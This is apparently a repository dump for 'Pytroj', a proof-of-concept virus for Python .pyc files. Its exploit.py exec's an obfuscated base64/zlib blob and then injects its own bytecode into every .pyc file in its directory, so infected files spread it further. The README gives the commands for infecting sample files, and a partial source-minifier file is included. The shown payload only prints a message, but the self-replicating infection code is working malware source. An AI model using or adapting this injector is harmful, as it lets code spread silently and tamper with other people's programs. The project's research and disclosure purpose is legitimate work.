├── b.py
├── c.py
├── filesize.py
├── LICENSE.md
├── README.md
├── exploit.py
├── minify.py
└── byteplay.py


/b.py:
--------------------------------------------------------------------------------
1 | print "Original"
2 | 


--------------------------------------------------------------------------------
/c.py:
--------------------------------------------------------------------------------
1 | print __file__
2 | import inspect
3 | print inspect.getfile(inspect.currentframe())
4 | 
5 | 


--------------------------------------------------------------------------------
/filesize.py:
--------------------------------------------------------------------------------
 1 | import marshal, byteplay
 2 | 
 3 | f = open('exploit.pyc')
 4 | f.read(8)
 5 | data = byteplay.Code.from_code(marshal.loads(f.read()))
 6 | count = 0
 7 | for op, args in data.code:
 8 |     if op == byteplay.SetLineno:
 9 |         count = args
10 | 
11 | print count, len(data.code)
12 | 


--------------------------------------------------------------------------------
/LICENSE.md:
--------------------------------------------------------------------------------
 1 | #Pytroj
 2 | ###PoC for trojan in python -- Copyright (C) 2011
 3 | 
 4 |  This library is free software; you can redistribute it and/or
 5 |  modify it under the terms of the GNU Lesser General Public
 6 |  License as published by the Free Software Foundation; either
 7 |  version 2.1 of the License, or (at your option) any later version.
 8 | 
 9 |  This library is distributed in the hope that it will be useful,
10 |  but WITHOUT ANY WARRANTY; without even the implied warranty of
11 |  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
12 |  Lesser General Public License for more details.
13 | 
14 |  You should have received a copy of the GNU Lesser General Public
15 |  License along with this library; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
16 | 
17 | ###Authors 
18 |  Joey Geralnik
19 |  
20 |  Leon Fedotov
21 |  
22 |  Itzik Kotler
23 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # Pytroj
 2 | 
 3 | __Pytroj is a proof of concept attack against .pyc files.__ It searches for other .pyc files and injects itself into them. The injected code can be any python code (in this case it prints "You have been exploited").
 4 | 
 5 | This proof of concept only searches for .pyc files in its own directory. To use it:
 6 | 
 7 |      python -c 'import exploit, b, c'
 8 |      python exploit.pyc
 9 | 
10 | The files b.pyc and c.pyc will now be infected. If you create another .pyc file (for example, python -c 'import byteplay') and run either b.pyc or c.pyc, the new file will also get infected.
11 | 
12 | Another way to run an infected file is to import it once the .pyc file exists:
13 | 
14 |      python -c 'import b'
15 | 
16 | The infected files print out a list of files that they have newly infected, followed by the phrase "You have been exploited"
17 | 
18 | After that, infected programs will continue to execute as normal.
19 | 
20 | [Slides are here](http://www.slideshare.net/DRagonRage519/pytroj-11153381 "slideshare")
21 | 
22 | 
23 | ### On the web
24 | 
25 | * [Symantec - python has venom.] (http://www.symantec.com/connect/blogs/python-has-venom) 
26 | * [Hackernews] (http://news.ycombinator.com/item?id=3039439)
27 | * [Jacob's Tips for Virus Removal] (http://jacoblol75.blog.com/2011/10/09/simple-ways-to-get-rid-of-python-pytroj/)
28 | * [Packet strom] (http://packetstormsecurity.org/files/105385/Pytroj-Tool-Python-Injector.html)
29 | 
30 | For help, questions, or comments, feel free to contact us:
31 | 
32 | 
33 | [Joey Geralnik](https://github.com/jgeralnik "jgeralnik"),
34 | [Leon Fedotov](https://twitter.com/#!/LeonFedotov "Leon Fedotov"),
35 | [Itzik Kotler](https://github.com/ikotler "itzikkotler")
36 | 


--------------------------------------------------------------------------------
/exploit.py:
--------------------------------------------------------------------------------
 1 | signature = "DC9723" #signature is placed at beginning and end of file to identify infected code
 2 | import glob, zlib, base64
 3 | 
 4 | #File only works as a pyc
 5 | if __file__.endswith('.pyc'):
 6 | 	   
 7 |    #The minified version of byteplay
 8 |    exec zlib.decompress(base64.b64decode('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'))
 9 | 
10 |    #Load this file and identify the exploit part
11 |    f = open(__file__, 'r')
12 | 
13 |    #First 8 bytes are magic number and timestamp
14 |    head = f.read(8)
15 | 
16 |    data = Code.from_code(marshal.loads(f.read()))
17 |    f.close()
18 | 
19 |    last_line = 1
20 |    for i in xrange(2, len(data.code)):
21 |       if data.code[i][0] == SetLineno:
22 |          #Find last line of code to update the real code appropriately 
23 |          last_line = data.code[i][1]
24 |       if type(data.code[i][1]) == type('') and data.code[i][1] == signature:
25 |          #Found signature at end of exploit
26 |          EXPLOIT_SIZE = i+1
27 |          break
28 | 
29 |    exploit = data.code[:EXPLOIT_SIZE]
30 | 
31 |    def infect(f_to_infect):
32 |    
33 |       f = open(f_to_infect, 'r')
34 | 
35 |       #Magic number and timestamp
36 |       head = f.read(8)
37 | 
38 |       data = Code.from_code(marshal.loads(f.read()))
39 |       if data.code[1][1] == signature:
40 |          #Code is already infected
41 |          return
42 |    
43 |       print f_to_infect
44 |       f.close()
45 |       lines = []
46 |       for i, op in enumerate(data.code):
47 |          if op[0] == SetLineno:
48 |             #Update line numbers to match with new code
49 |             data.code[i] = (SetLineno, op[1]+last_line)
50 |       
51 |       #Insert exploit
52 |       data.code[:0] = exploit
53 | 
54 |       newfile = open(f_to_infect, 'w')
55 |       newfile.write(head)
56 |       marshal.dump(data.to_code(), newfile)
57 |       newfile.close()
58 |    for i in glob.glob("./*.pyc"):
59 |       infect(i)
60 | 
61 |    print "You have been exploited"
62 | 
63 | signature = "DC9723"
64 | 


--------------------------------------------------------------------------------
/minify.py:
--------------------------------------------------------------------------------
  1 | ## {{{ http://code.activestate.com/recipes/576704/ (r16)
  2 | #!/usr/bin/env python
  3 | # -*- coding: utf-8 -*-
  4 | #
  5 | #       pyminifier.py
  6 | #
  7 | #       Copyright 2009 Dan McDougall <YouKnowWho@YouKnowWhat.com>
  8 | #
  9 | #       This program is free software; you can redistribute it and/or modify
 10 | #       it under the terms of the GNU General Public License as published by
 11 | #       the Free Software Foundation; Version 3 of the License
 12 | #
 13 | #       This program is distributed in the hope that it will be useful,
 14 | #       but WITHOUT ANY WARRANTY; without even the implied warranty of
 15 | #       MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 16 | #       GNU General Public License for more details.
 17 | #
 18 | #       You should have received a copy of the GNU General Public License
 19 | #       along with this program; if not, the license can be downloaded here:
 20 | #
 21 | #       http://www.gnu.org/licenses/gpl.html
 22 | 
 23 | # Meta
 24 | __version__ = '1.4.1'
 25 | __license__ = "GNU General Public License (GPL) Version 3"
 26 | __version_info__ = (1, 4, 1)
 27 | __author__ = 'Dan McDougall <YouKnowWho@YouKnowWhat.com>'
 28 | 
 29 | """
 30 | **Python Minifier:**  Reduces the size of (minifies) Python code for use on
 31 | embedded platforms.
 32 | 
 33 | Performs the following:
 34 |      - Removes docstrings.
 35 |      - Removes comments.
 36 |      - Minimizes code indentation.
 37 |      - Joins multiline pairs of parentheses, braces, and brackets (and removes extraneous whitespace within).
 38 |      - Preserves shebangs and encoding info (e.g. "# -- coding: utf-8 --").
 39 | 
 40 | Various examples and edge cases are sprinkled throughout the pyminifier code so
 41 | that it can be tested by minifying itself.  The way to test is thus:
 42 | 
 43 | .. code-block:: bash
 44 | 
 45 |     $ python pyminifier.py pyminifier.py > minified_pyminifier.py
 46 |     $ python minified_pyminifier.py pyminifier.py > this_should_be_identical.py
 47 |     $ diff minified_pyminifier.py this_should_be_identical.py
 48 |     $
 49 | 
 50 | If you get an error executing minified_pyminifier.py or
 51 | 'this_should_be_identical.py' isn't identical to minified_pyminifier.py then
 52 | something is broken.
 53 | """
 54 | 
 55 | import sys, re, cStringIO, tokenize
 56 | from optparse import OptionParser
 57 | 
 58 | # Compile our regular expressions for speed
 59 | multiline_quoted_string = re.compile(r'(\'\'\'|\"\"\")')
 60 | not_quoted_string = re.compile(r'(\".*\'\'\'.*\"|\'.*\"\"\".*\')')
 61 | trailing_newlines = re.compile(r'\n\n')
 62 | shebang = re.compile('^#\!.*$')
 63 | encoding = re.compile(".*coding[:=]\s*([-\w.]+)")
 64 | multiline_indicator = re.compile('\\\\(\s*#.*)?\n')
 65 | # The above also removes trailing comments: "test = 'blah \ # comment here"
 66 | 
 67 | # These aren't used but they're a pretty good reference:
 68 | double_quoted_string = re.compile(r'((?<!\\)".*?(?<!\\)")')
 69 | single_quoted_string = re.compile(r"((?<!\\)'.*?(?<!\\)')")
 70 | single_line_single_quoted_string = re.compile(r"((?<!\\)'''.*?(?<!\\)''')")
 71 | single_line_double_quoted_string = re.compile(r"((?<!\\)'''.*?(?<!\\)''')")
 72 | 
 73 | def remove_comments_and_docstrings(source):
 74 |     """
 75 |     Returns 'source' minus comments and docstrings.
 76 | 
 77 |     **Note**: Uses Python's built-in tokenize module to great effect.
 78 | 
 79 |     Example:
 80 | 
 81 |     .. code-block:: python
 82 | 
 83 |         def noop(): # This is a comment
 84 |             '''
 85 |             Does nothing.
 86 |             '''
 87 |             pass # Don't do anything
 88 | 
 89 |     Will become:
 90 | 
 91 |     .. code-block:: python
 92 | 
 93 |         def noop():
 94 |             pass
 95 |     """
 96 |     io_obj = cStringIO.StringIO(source)
 97 |     out = ""
 98 |     prev_toktype = tokenize.INDENT
 99 |     last_lineno = -1
100 |     last_col = 0
101 |     for tok in tokenize.generate_tokens(io_obj.readline):
102 |         token_type = tok[0]
103 |         token_string = tok[1]
104 |         start_line, start_col = tok[2]
105 |         end_line, end_col = tok[3]
106 |         ltext = tok[4]
107 |         # The following two conditionals preserve indentation.
108 |         # This is necessary because we're not using tokenize.untokenize()
109 |         # (because it spits out code with copious amounts of oddly-placed
110 |         # whitespace).
111 |         if start_line > last_lineno:
112 |             last_col = 0
113 |         if start_col > last_col:
114 |             out += (" " * (start_col - last_col))
115 |         # Remove comments:
116 |         if token_type == tokenize.COMMENT:
117 |             pass
118 |         # This series of conditionals removes docstrings:
119 |         elif token_type == tokenize.STRING:
120 |             if prev_toktype != tokenize.INDENT:
121 |         # This is likely a docstring; double-check we're not inside an operator:
122 |                 if prev_toktype != tokenize.NEWLINE:
123 |                     # Note regarding NEWLINE vs NL: The tokenize module
124 |                     # differentiates between newlines that start a new statement
125 |                     # and newlines inside of operators such as parens, brackes,
126 |                     # and curly braces.  Newlines inside of operators are
127 |                     # NEWLINE and newlines that start new code are NL.
128 |                     # Catch whole-module docstrings:
129 |                     if start_col > 0:
130 |                         # Unlabelled indentation means we're inside an operator
131 |                         out += token_string
132 |                     # Note regarding the INDENT token: The tokenize module does
133 |                     # not label indentation inside of an operator (parens,
134 |                     # brackets, and curly braces) as actual indentation.
135 |                     # For example:
136 |                     # def foo():
137 |                     #     "The spaces before this docstring are tokenize.INDENT"
138 |                     #     test = [
139 |                     #         "The spaces before this string do not get a token"
140 |                     #     ]
141 |         else:
142 |             out += token_string
143 |         prev_toktype = token_type
144 |         last_col = end_col
145 |         last_lineno = end_line
146 |     return out
147 | 
148 | def reduce_operators(source):
149 |     """
150 |     Remove spaces between operators in 'source' and returns the result.
151 | 
152 |     Example:
153 | 
154 |     .. code-block:: python
155 | 
156 |         def foo(foo, bar, blah):
157 |             test = "This is a %s" % foo
158 | 
159 |     Will become:
160 | 
161 |     .. code-block:: python
162 | 
163 |         def foo(foo,bar,blah):
164 |             test="This is a %s"%foo
165 |     """
166 |     io_obj = cStringIO.StringIO(source)
167 |     remove_columns = []
168 |     out = ""
169 |     out_line = ""
170 |     prev_toktype = tokenize.INDENT
171 |     prev_tok = None
172 |     last_lineno = -1
173 |     last_col = 0
174 |     lshift = 1
175 |     for tok in tokenize.generate_tokens(io_obj.readline):
176 |         token_type = tok[0]
177 |         token_string = tok[1]
178 |         start_line, start_col = tok[2]
179 |         end_line, end_col = tok[3]
180 |         ltext = tok[4]
181 |         if start_line > last_lineno:
182 |             last_col = 0
183 |         if start_col > last_col:
184 |             out_line += (" " * (start_col - last_col))
185 |         if token_type == tokenize.OP:
186 |             # Operators that begin a line such as @ or open parens should be
187 |             # left alone
188 |             start_of_line_types = [ # These indicate we're starting a new line
189 |                 tokenize.NEWLINE, tokenize.DEDENT, tokenize.INDENT]
190 |             if prev_toktype not in start_of_line_types:
191 |                 # This is just a regular operator; remove spaces
192 |                 remove_columns.append(start_col) # Before OP
193 |                 remove_columns.append(end_col+1) # After OP
194 |         if token_string.endswith('\n'):
195 |             out_line += token_string
196 |             if remove_columns:
197 |                 for col in remove_columns:
198 |                     col = col - lshift
199 |                     try:
200 |             # This was really handy for debugging (looks nice, worth saving):
201 |                         #print out_line + (" " * col) + "^"
202 |                         # The above points to the character we're looking at
203 |                         if out_line[col] == " ": # Only if it is a space
204 |                             out_line = out_line[:col] + out_line[col+1:]
205 |                             lshift += 1 # To re-align future changes on this line
206 |                     except IndexError: # Reached and end of line, no biggie
207 |                         pass
208 |             out += out_line
209 |             remove_columns = []
210 |             out_line = ""
211 |             lshift = 1
212 |         else:
213 |             out_line += token_string
214 |         prev_toktype = token_type
215 |         prev_token = tok
216 |         last_col = end_col
217 |         last_lineno = end_line
218 |     # This makes sure to capture the last line if it doesn't end in a newline:
219 |     out += out_line
220 |     # The tokenize module doesn't recognize @ sign before a decorator
221 |     return out
222 | 
223 | # NOTE: This isn't used anymore...  Just here for reference in case someone
224 | # searches the internet looking for a way to remove similarly-styled end-of-line
225 | # comments from non-python code.  It also acts as an edge case of sorts with
226 | # that raw triple quoted string inside the "quoted_string" assignment.
227 | def remove_comment(single_line):
228 |     """
229 |     Removes the comment at the end of the line (if any) and returns the result.
230 |     """
231 |     quoted_string = re.compile(
232 |         r'''((?<!\\)".*?(?<!\\)")|((?<!\\)'.*?(?<!\\)')'''
233 |     )
234 |     # This divides the line up into sections:
235 |     #   Those inside single quotes and those that are not
236 |     split_line = quoted_string.split(single_line)
237 |     # Remove empty items:
238 |     split_line = [a for a in split_line if a]
239 |     out_line = ""
240 |     for section in split_line:
241 |         if section.startswith("'") or section.startswith('"'):
242 |             # This is a quoted string; leave it alone
243 |             out_line += section
244 |         elif '#' in section: # A '#' not in quotes?  There's a comment here!
245 |             # Get rid of everything after the # including the # itself:
246 |             out_line += section.split('#')[0]
247 |             break # No reason to bother the rest--it's all comments
248 |         else:
249 |             # This isn't a quoted string OR a comment; leave it as-is
250 |             out_line += section
251 |     return out_line.rstrip() # Strip trailing whitespace before returning
252 | 
253 | def join_multiline_pairs(text, pair="()"):
254 |     """
255 |     Finds and removes newlines in multiline matching pairs of characters in
256 |     'text'.  For example, "(.*\n.*), {.*\n.*}, or [.*\n.*]".
257 | 
258 |     By default it joins parens () but it will join any two characters given via
259 |     the 'pair' variable.
260 | 
261 |     **Note:** Doesn't remove extraneous whitespace that ends up between the pair.
262 |     Use reduce_operators() for that.
263 | 
264 |     Example:
265 | 
266 |     .. code-block:: python
267 | 
268 |         test = (
269 |             "This is inside a multi-line pair of parentheses"
270 |         )
271 | 
272 |     Will become:
273 | 
274 |     .. code-block:: python
275 | 
276 |         test = (            "This is inside a multi-line pair of parentheses"        )
277 |     """
278 |     # Readability variables
279 |     opener = pair[0]
280 |     closer = pair[1]
281 | 
282 |     # Tracking variables
283 |     inside_pair = False
284 |     inside_quotes = False
285 |     inside_double_quotes = False
286 |     inside_single_quotes = False
287 |     quoted_string = False
288 |     openers = 0
289 |     closers = 0
290 |     linecount = 0
291 | 
292 |     # Regular expressions
293 |     opener_regex = re.compile('\%s' % opener)
294 |     closer_regex = re.compile('\%s' % closer)
295 | 
296 |     output = ""
297 | 
298 |     for line in text.split('\n'):
299 |         escaped = False
300 |         # First we rule out multi-line strings
301 |         multline_match = multiline_quoted_string.search(line)
302 |         not_quoted_string_match = not_quoted_string.search(line)
303 |         if multline_match and not not_quoted_string_match and not quoted_string:
304 |             if len(line.split('"""')) > 1 or len(line.split("'''")):
305 |                 # This is a single line that uses the triple quotes twice
306 |                 # Treat it as if it were just a regular line:
307 |                 output += line + '\n'
308 |                 quoted_string = False
309 |             else:
310 |                 output += line + '\n'
311 |                 quoted_string = True
312 |         elif quoted_string and multiline_quoted_string.search(line):
313 |             output += line + '\n'
314 |             quoted_string = False
315 |         # Now let's focus on the lines containing our opener and/or closer:
316 |         elif not quoted_string:
317 |             if opener_regex.search(line) or closer_regex.search(line) or inside_pair:
318 |                 for character in line:
319 |                     if character == opener:
320 |                         if not escaped and not inside_quotes:
321 |                             openers += 1
322 |                             inside_pair = True
323 |                             output += character
324 |                         else:
325 |                             escaped = False
326 |                             output += character
327 |                     elif character == closer:
328 |                         if not escaped and not inside_quotes:
329 |                             if openers and openers == (closers + 1):
330 |                                 closers = 0
331 |                                 openers = 0
332 |                                 inside_pair = False
333 |                                 output += character
334 |                             else:
335 |                                 closers += 1
336 |                                 output += character
337 |                         else:
338 |                             escaped = False
339 |                             output += character
340 |                     elif character == '\\':
341 |                         if escaped:
342 |                             escaped = False
343 |                             output += character
344 |                         else:
345 |                             escaped = True
346 |                             output += character
347 |                     elif character == '"' and escaped:
348 |                         output += character
349 |                         escaped = False
350 |                     elif character == "'" and escaped:
351 |                         output += character
352 |                         escaped = False
353 |                     elif character == '"' and inside_quotes:
354 |                         if inside_single_quotes:
355 |                             output += character
356 |                         else:
357 |                             inside_quotes = False
358 |                             inside_double_quotes = False
359 |                             output += character
360 |                     elif character == "'" and inside_quotes:
361 |                         if inside_double_quotes:
362 |                             output += character
363 |                         else:
364 |                             inside_quotes = False
365 |                             inside_single_quotes = False
366 |                             output += character
367 |                     elif character == '"' and not inside_quotes:
368 |                         inside_quotes = True
369 |                         inside_double_quotes = True
370 |                         output += character
371 |                     elif character == "'" and not inside_quotes:
372 |                         inside_quotes = True
373 |                         inside_single_quotes = True
374 |                         output += character
375 |                     elif character == ' ' and inside_pair and not inside_quotes:
376 |                         if not output[-1] in [' ', opener]:
377 |                             output += ' '
378 |                     else:
379 |                         if escaped:
380 |                             escaped = False
381 |                         output += character
382 |                 if inside_pair == False:
383 |                     output += '\n'
384 |             else:
385 |                 output += line + '\n'
386 |         else:
387 |             output += line + '\n'
388 | 
389 |     # Clean up
390 |     output = trailing_newlines.sub('\n', output)
391 | 
392 |     return output
393 | 
394 | def dedent(source):
395 |     """
396 |     Minimizes indentation to save precious bytes
397 | 
398 |     Example:
399 | 
400 |     .. code-block:: python
401 | 
402 |         def foo(bar):
403 |             test = "This is a test"
404 | 
405 |     Will become:
406 | 
